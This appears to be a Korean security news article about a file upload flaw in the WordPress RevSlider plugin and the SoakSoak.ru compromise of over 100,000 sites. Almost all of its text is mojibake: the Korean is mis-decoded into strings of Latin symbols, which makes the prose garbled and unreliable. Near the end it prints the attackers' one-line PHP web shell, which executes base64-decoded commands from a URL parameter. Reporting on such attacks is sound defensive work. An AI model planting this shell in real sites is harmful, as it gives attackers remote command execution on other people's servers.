À¥¼¿À» ¾÷·ÎµåÇÒ ¼ö ÀÖ´Â ÆÄÀÏ ¾÷·Îµå Ãë¾àÁ¡ ¹ß°ß
[º¸¾È´º½º ¹Î¼¼¾Æ] ¿öµåÇÁ·¹½ºÀÇ Ç÷¯±×ÀÎ ÇüÅ·Π¼³Ä¡µÇ´Â ½½¶óÀÌ´õ ·¹º¼·ç¼Ç(RevSlider)¿¡¼ À¥¼¿À» ¾÷·ÎµåÇÒ ¼ö ÀÖ´Â ÆÄÀÏ ¾÷·Îµå Ãë¾àÁ¡ÀÌ ¹ß°ßµÆÀ¸¸ç, ÀÌ·Î ÀÎÇØ 100,000°³ÀÇ »çÀÌÆ®°¡ ÇØÅ·¿¡ ¿µÇâÀ» ¹ÞÀº °ÍÀ¸·Î µå·¯³µ´Ù.
¿öµåÇÁ·¹½º´Â ºí·Î±ë°ú À¥ ÄÁÅÙÃ÷ °ü¸®(CMS)¸¦ À§ÇØ ÁÖ·Î ÀÌ¿ëµÇ´Â ¼ÒÇÁÆ®¿þ¾îÀ̸ç, ½½¶óÀ̵带 µðÀÚÀÎÇϱâ À§ÇØ »ç¿ëÇÏ´Â ¡®½½¶óÀÌ´õ ·¹º¼·ç¼Ç Ç÷¯±×ÀΡ¯¿¡¼ ÆÄÀÏ ¾÷·Îµå Ãë¾àÁ¡(Slider Revolution shell upload exploit)ÀÌ ¹ß°ßµÆ´Ù.
ÇØ´ç Ãë¾àÁ¡Àº Simo Ben youssef¿¡ ÀÇÇØ Áö³ 2014³â 10¿ù 15ÀÏ ¹ß°ßµÆ´Ù. Ãë¾àÁ¡ÀÌ ¹ß»ýÇÏ´Â °ü¸®ÀÚ ÆäÀÌÁö¿¡ Á¢±ÙÇÒ ¶§ º°µµÀÇ ÀÎÁõÀÌ ¾øÀ¸¸ç, ¾÷·Îµå ÆÄÀÏ¿¡ ´ëÇÑ °ËÁõÀÌ ºÎÀçÇØ ¹ß»ýÇÏ´Â Ãë¾àÁ¡ÀÌ´Ù.
°ø°ÝÀÚ´Â ¿öµåÇÁ·¹½º°¡ ¼³Ä¡µÈ Ãë¾àÇÑ À¥»çÀÌÆ®¸¦ ½ºÄµÇÑ ÈÄ À¥¼¿ ¾÷·Îµå¸¦ ÅëÇØ ¼¹ö¸¦ Àå¾ÇÇÏ°í ¾Ç¼ºÄÚµå À¯Æ÷ µî Ãß°¡ÀûÀÎ °ø°ÝÀ» ¼öÇàÇÑ °ÍÀ¸·Î ¾Ë·ÁÁ³´Ù.
º¸¾È¾÷ü Securi´Â, 100,000°³ ÀÌ»óÀÇ ¿öµåÇÁ·¹½º¸¦ ÀÌ¿ëÇÏ´Â »çÀÌÆ®°¡ ÇØ´ç °ø°Ý¿¡ ³ëÃâµÇ¾î ÇØÅ·µÆ´Ù´Â »ç½ÇÀ» ¹ßÇ¥Çß´Ù. ±¸±ÛÀº °Ë»ö °á°ú ÆäÀÌÁö¿¡ SoakSoak.ru°¡ Æ÷ÇԵǾî ÀÖÀ» °æ¿ì Safe BrowsingÀ¸·Î °Ë»ö »çÀÌÆ®·ÎÀÇ Á¢±ÙÀ» Â÷´Ü½ÃÅ°´Â Á¶Ä¡¸¦ ÃëÇÏ°í ÀÖ´Ù.
Ãë¾àÁ¡À» ÅëÇØ ¾Ç¼ºÄڵ带 À¯Æ÷ÇÏ´Â ÃÖÃÊ µµ¸ÞÀÎ À̸§Àº ¡®SoakSoak.ru¡¯À̸ç, °ø°ÝÀÚ°¡ ÇØÅ·¿¡ »ç¿ëÇÑ À¥¼¿ ÄÚµå´Â <?php system(base64_decode($_GET[¡®cmd¡¯])); ?>´Ù.
ÀÌ¿Í °ü·Ã º¸´Ù ÀÚ¼¼ÇÑ »çÇ×Àº ¾Æ·¡ÀÇ Ãâó¸¦ Âü°íÇϰųª Çѱ¹ÀÎÅͳÝÁøÈï¿ø ÀÎÅͳÝħÇØ´ëÀÀ¼¾ÅÍ È¨ÆäÀÌÁö¸¦ Âü°íÇÏ¸é µÈ´Ù.
[Ãâó]
1.http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522
2.http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html
3.https://www.centrora.com/blog/update-centrora-security-protect-soaksoak-malware/
[¹Î¼¼¾Æ ±âÀÚ(boan5@boannews.com)]
<ÀúÀÛ±ÇÀÚ: º¸¾È´º½º(http://www.boannews.com/) ¹«´ÜÀüÀç-Àç¹èÆ÷±ÝÁö>